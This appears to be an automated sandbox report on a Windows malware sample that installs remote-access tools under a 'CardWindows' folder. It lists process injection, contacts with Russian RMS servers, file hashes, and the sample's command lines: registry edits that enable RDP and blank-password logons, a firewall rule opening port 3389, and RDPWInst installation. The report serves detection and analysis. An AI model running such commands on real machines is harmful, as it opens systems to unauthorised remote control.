Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\CardWindows\sys.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\CardWindows\sys.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
N/A N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
N/A N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
N/A N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1188 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1188 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1188 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1188 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1188 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1188 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1188 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1188 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1188 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1188 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1188 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1188 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1188 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1188 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1188 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1916 wrote to memory of 2584 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 1916 wrote to memory of 3352 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 1916 wrote to memory of 2584 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 1916 wrote to memory of 3352 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 1916 wrote to memory of 2584 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 1916 wrote to memory of 3352 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 1188 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\sys.exe
PID 1188 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\sys.exe
PID 1188 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\sys.exe
PID 1708 wrote to memory of 3368 N/A C:\Program Files\CardWindows\sys.exe C:\Windows\SysWOW64\cmd.exe
PID 1708 wrote to memory of 3368 N/A C:\Program Files\CardWindows\sys.exe C:\Windows\SysWOW64\cmd.exe
PID 1708 wrote to memory of 3368 N/A C:\Program Files\CardWindows\sys.exe C:\Windows\SysWOW64\cmd.exe
PID 3368 wrote to memory of 1152 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 1152 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 1152 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 3412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 3412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 3412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 2556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 2556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 2556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 3048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 3368 wrote to memory of 3048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 3368 wrote to memory of 3048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2584 wrote to memory of 1628 N/A C:\Program Files\CardWindows\SystemDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 2584 wrote to memory of 1628 N/A C:\Program Files\CardWindows\SystemDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 2584 wrote to memory of 1628 N/A C:\Program Files\CardWindows\SystemDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 3368 wrote to memory of 1872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\RDPWInst.exe
PID 3368 wrote to memory of 1872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\RDPWInst.exe
PID 3368 wrote to memory of 1872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\RDPWInst.exe

Processes

C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe

"C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe"

C:\Windows\SysWOW64\regedit.exe

regedit /s "C:\Program Files\CardWindows\\regedit.reg"

C:\Windows\SysWOW64\regedit.exe

regedit /s "regedit.reg"

C:\Program Files\CardWindows\MSIDrvs.exe

"C:\Program Files\CardWindows\\MSIDrvs.exe" /silentinstall

C:\Program Files\CardWindows\MSIDrvs.exe

"C:\Program Files\CardWindows\\MSIDrvs.exe" /firewall

C:\Program Files\CardWindows\MSIDrvs.exe

"C:\Program Files\CardWindows\\MSIDrvs.exe" /start

C:\Program Files\CardWindows\MSIDrvs.exe

"C:\Program Files\CardWindows\MSIDrvs.exe"

C:\Program Files\CardWindows\SystemDrvs.exe

"C:\Program Files\CardWindows\SystemDrvs.exe"

C:\Program Files\CardWindows\SystemDrvs.exe

"C:\Program Files\CardWindows\SystemDrvs.exe" /tray

C:\Program Files\CardWindows\sys.exe

"C:\Program Files\CardWindows\\sys.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Windows/run.bat

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v limitblankpassworduse /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow

C:\Program Files\CardWindows\SystemDrvs.exe

"C:\Program Files\CardWindows\SystemDrvs.exe" /tray

C:\Windows\system32\MusNotifyIcon.exe

%systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13

C:\Windows\RDPWInst.exe

"RDPWInst.exe" -i -o

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

Network

Country Destination Domain Proto
US 209.197.3.8:80 tcp
US 72.21.91.29:80 tcp
US 8.8.8.8:53 rmansys.ru udp
RU 31.31.198.18:80 rmansys.ru tcp
RU 31.31.198.18:80 rmansys.ru tcp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
US 8.8.8.8:53 geo.prod.do.dsp.mp.microsoft.com udp
US 52.184.216.226:443 geo.prod.do.dsp.mp.microsoft.com tcp
US 8.8.8.8:53 kv801.prod.do.dsp.mp.microsoft.com udp
NL 184.29.205.60:443 kv801.prod.do.dsp.mp.microsoft.com tcp
US 8.8.8.8:53 cp801.prod.do.dsp.mp.microsoft.com udp
NL 184.29.205.60:443 cp801.prod.do.dsp.mp.microsoft.com tcp
NL 184.29.205.60:443 cp801.prod.do.dsp.mp.microsoft.com tcp

Files

C:\Program Files\CardWindows\regedit.reg

MD5 06c5938fae635bb8ce25794b720d792b
SHA1 bedbcddd59e5648543b53d0d66b643a2d26cb262
SHA256 bfd56a7929f620d054ae39a4815632934af9ce91810190ecc02c0381e61bdd5f
SHA512 befab3eddba41837c4e16000580e159934829a99827b03e382bea6a01cd5503a3f8b82746c0e9902b760dc8ab308dfa19fd7e8503d631acead4c9454c728d9fa

C:\Program Files\CardWindows\MSIDrvs.exe

MD5 fcc39072590b72de6f9c8e0559155fd6
SHA1 1ff3ac690d6ff39639699d373314291b4a797393
SHA256 74974af03632e5770fbb5e68bae28d71398ba32b018b35fb9e5c85788fa1008c
SHA512 1bfcb20ee8b11e08e4865162050379d220e647dddef811b93945fe7b47939de000e104ff3365b737fcee8752a08d04ba7130e94e2ec6e576442eb4b758ad047f

C:\Program Files\CardWindows\MSIDrvs.exe

MD5 fcc39072590b72de6f9c8e0559155fd6
SHA1 1ff3ac690d6ff39639699d373314291b4a797393
SHA256 74974af03632e5770fbb5e68bae28d71398ba32b018b35fb9e5c85788fa1008c
SHA512 1bfcb20ee8b11e08e4865162050379d220e647dddef811b93945fe7b47939de000e104ff3365b737fcee8752a08d04ba7130e94e2ec6e576442eb4b758ad047f

memory/1872-133-0x00000000010B0000-0x00000000010B1000-memory.dmp

C:\Program Files\CardWindows\MSIDrvs.exe

MD5 fcc39072590b72de6f9c8e0559155fd6
SHA1 1ff3ac690d6ff39639699d373314291b4a797393
SHA256 74974af03632e5770fbb5e68bae28d71398ba32b018b35fb9e5c85788fa1008c
SHA512 1bfcb20ee8b11e08e4865162050379d220e647dddef811b93945fe7b47939de000e104ff3365b737fcee8752a08d04ba7130e94e2ec6e576442eb4b758ad047f

memory/1488-135-0x0000000002A90000-0x0000000002A91000-memory.dmp

C:\Program Files\CardWindows\MSIDrvs.exe

MD5 fcc39072590b72de6f9c8e0559155fd6
SHA1 1ff3ac690d6ff39639699d373314291b4a797393
SHA256 74974af03632e5770fbb5e68bae28d71398ba32b018b35fb9e5c85788fa1008c
SHA512 1bfcb20ee8b11e08e4865162050379d220e647dddef811b93945fe7b47939de000e104ff3365b737fcee8752a08d04ba7130e94e2ec6e576442eb4b758ad047f

C:\Program Files\CardWindows\MSIDrvs.exe

MD5 fcc39072590b72de6f9c8e0559155fd6
SHA1 1ff3ac690d6ff39639699d373314291b4a797393
SHA256 74974af03632e5770fbb5e68bae28d71398ba32b018b35fb9e5c85788fa1008c
SHA512 1bfcb20ee8b11e08e4865162050379d220e647dddef811b93945fe7b47939de000e104ff3365b737fcee8752a08d04ba7130e94e2ec6e576442eb4b758ad047f

memory/2980-138-0x0000000002950000-0x0000000002951000-memory.dmp

memory/1916-139-0x0000000000B80000-0x0000000000B81000-memory.dmp

C:\Program Files\CardWindows\vp8decoder.dll

MD5 d43fa82fab5337ce20ad14650085c5d9
SHA1 678aa092075ff65b6815ffc2d8fdc23af8425981
SHA256 c022958429edd94bfe31f2eacfe24ff6b45d6f12747725c449a36116373de03b
SHA512 103e61a9f58df03316676a074487e50ec518479c11068df3736df139b85c7671048c65bce0ef2c55b3c50c61fde54e9e6c7d1b795aea71263ae94c91d4874e0d

C:\Program Files\CardWindows\SystemDrvs.exe

MD5 0bc376498b56d88341bd711ad4b823d2
SHA1 d96d9566628786bd40768949ec6f9b67ade357eb
SHA256 8929fa37860921d1f43eec6192876e6e6daf82d2013aeb08e0285ac5456fd52a
SHA512 64b5f671afe8186adf7930bafce7ccb4c3378a47ceb330aa0dfe36e34cfc6bcba8742497f721395292185864541d618affe6040961f90c5b663c914c93f33656

C:\Program Files\CardWindows\vp8encoder.dll

MD5 dab4646806dfca6d0e0b4d80fa9209d6
SHA1 8244dfe22ec2090eee89dad103e6b2002059d16a
SHA256 cb6ef96d3a66ef08ec2c8640b751a52d6d4f4530cf01162a69966f0fd5153587
SHA512 aa5eb93bf23a10de797d6fb52a55a95d36bc48927c76fedd81e0c48872745cb7f7d1b3f230eaae42fd4e79b6a59ca707e56bd6963b03644cbd5984f11e98d6e7

C:\Program Files\CardWindows\SystemDrvs.exe

MD5 0bc376498b56d88341bd711ad4b823d2
SHA1 d96d9566628786bd40768949ec6f9b67ade357eb
SHA256 8929fa37860921d1f43eec6192876e6e6daf82d2013aeb08e0285ac5456fd52a
SHA512 64b5f671afe8186adf7930bafce7ccb4c3378a47ceb330aa0dfe36e34cfc6bcba8742497f721395292185864541d618affe6040961f90c5b663c914c93f33656

C:\Program Files\CardWindows\SystemDrvs.exe

MD5 0bc376498b56d88341bd711ad4b823d2
SHA1 d96d9566628786bd40768949ec6f9b67ade357eb
SHA256 8929fa37860921d1f43eec6192876e6e6daf82d2013aeb08e0285ac5456fd52a
SHA512 64b5f671afe8186adf7930bafce7ccb4c3378a47ceb330aa0dfe36e34cfc6bcba8742497f721395292185864541d618affe6040961f90c5b663c914c93f33656

memory/3352-145-0x0000000000BB0000-0x0000000000BB1000-memory.dmp

memory/2584-146-0x00000000029A0000-0x00000000029A1000-memory.dmp

C:\Program Files\CardWindows\sys.exe

MD5 faf1fc3b0b4e42ab038677f1168fbf17
SHA1 5e04f80934853f0552079c27b7d2fd6e62dd1b3c
SHA256 a262cec7448e5db073fc858f5f7e6c871460e8853a12a34f96d3cce95eebf109
SHA512 74f2dd08e0f3c1d9b44c104abae62b31d1d49c4e1e7e5a15b11154dd1cae10280adb93e202a62e7772d617d5d3154e1a61bb11a9e929fb2610a6ed8a0a7f80e2

C:\Program Files\CardWindows\sys.exe

MD5 faf1fc3b0b4e42ab038677f1168fbf17
SHA1 5e04f80934853f0552079c27b7d2fd6e62dd1b3c
SHA256 a262cec7448e5db073fc858f5f7e6c871460e8853a12a34f96d3cce95eebf109
SHA512 74f2dd08e0f3c1d9b44c104abae62b31d1d49c4e1e7e5a15b11154dd1cae10280adb93e202a62e7772d617d5d3154e1a61bb11a9e929fb2610a6ed8a0a7f80e2

memory/1708-149-0x0000000000400000-0x00000000009B7003-memory.dmp

memory/1708-150-0x0000000000400000-0x00000000009B7003-memory.dmp

memory/1708-153-0x0000000000401000-0x0000000000797000-memory.dmp

memory/1708-154-0x0000000002710000-0x0000000002713000-memory.dmp

memory/1708-155-0x0000000000DC0000-0x0000000000DC6000-memory.dmp

memory/1708-156-0x00000000026C0000-0x000000000270B000-memory.dmp

C:\Windows\run.bat

MD5 93a098e3701bf40042a0e51d3a125b31
SHA1 2dcbf75b8d8bba7830aa363c1e56560e552c726a
SHA256 8a0c16ab6f2b5af74b62fe041b8bc1ddf8dc03fb713c5bb30beceba307bb1269
SHA512 06d97a68fc971bc5c739f5da10a172c2279b9158b994d78b7eb60fff6e484c118b70631df788557a213f26baae00cde9ed7e176b1495c5d2ec74099a7fa3fa12

memory/1708-158-0x000000007FE40000-0x000000007FE41000-memory.dmp

C:\Program Files\CardWindows\SystemDrvs.exe

MD5 0bc376498b56d88341bd711ad4b823d2
SHA1 d96d9566628786bd40768949ec6f9b67ade357eb
SHA256 8929fa37860921d1f43eec6192876e6e6daf82d2013aeb08e0285ac5456fd52a
SHA512 64b5f671afe8186adf7930bafce7ccb4c3378a47ceb330aa0dfe36e34cfc6bcba8742497f721395292185864541d618affe6040961f90c5b663c914c93f33656

memory/1628-160-0x0000000000E80000-0x0000000000E81000-memory.dmp

C:\Windows\RDPWInst.exe

MD5 9c257b1d15817a818a675749f0429130
SHA1 234d14da613c1420ea17de60ab8c3621d1599f6f
SHA256 b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c
SHA512 b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521

C:\Windows\RDPWInst.exe

MD5 9c257b1d15817a818a675749f0429130
SHA1 234d14da613c1420ea17de60ab8c3621d1599f6f
SHA256 b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c
SHA512 b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521